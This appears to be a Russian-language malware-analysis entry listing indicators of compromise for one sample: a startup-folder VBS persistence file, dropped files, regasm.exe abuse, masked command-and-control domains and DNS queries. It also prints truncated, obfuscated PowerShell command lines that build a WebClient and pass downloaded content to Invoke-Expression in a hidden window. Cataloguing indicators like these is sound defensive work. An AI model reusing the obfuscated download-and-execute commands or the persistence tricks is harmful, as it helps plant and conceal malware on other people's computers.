Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\<Имя файла>.vbs
- %WINDIR%\microsoft.net\framework\v2.0.50727\regasm.exe
- %APPDATA%\aqb\rar.exe
- %APPDATA%\aqb\directx.capture.dll
- %APPDATA%\aqb\dshownet.dll
- 'gb####ttredszzz.xyz':443
- 'mo#####.publicvm.com':82
- 'de##an.info':80
- 'gb####ttredszzz.xyz':443
- 'mo#####.publicvm.com':82
- DNS ASK gb####ttredszzz.xyz
- DNS ASK mo#####.publicvm.com
- DNS ASK de##an.info
- '<SYSTEM32>\cmd.exe' /cPowershell -noexit -comma Invoke-Expression((n`e`W`-Obj`E`c`T (('Net'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'.'+'Webc'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'lient'))).((...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /cPowershell -noexit -comma Invoke-Expression((n`e`W`-Obj`E`c`T (('Net'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'.'+'Webc'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'lient'))).((...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -comma Invoke-Expression((n`e`W`-Obj`E`c`T (('Net'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'.'+'Webc'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'lient'))).(('D'+'o'+'w'+'n...
- '%WINDIR%\microsoft.net\framework\v2.0.50727\regasm.exe'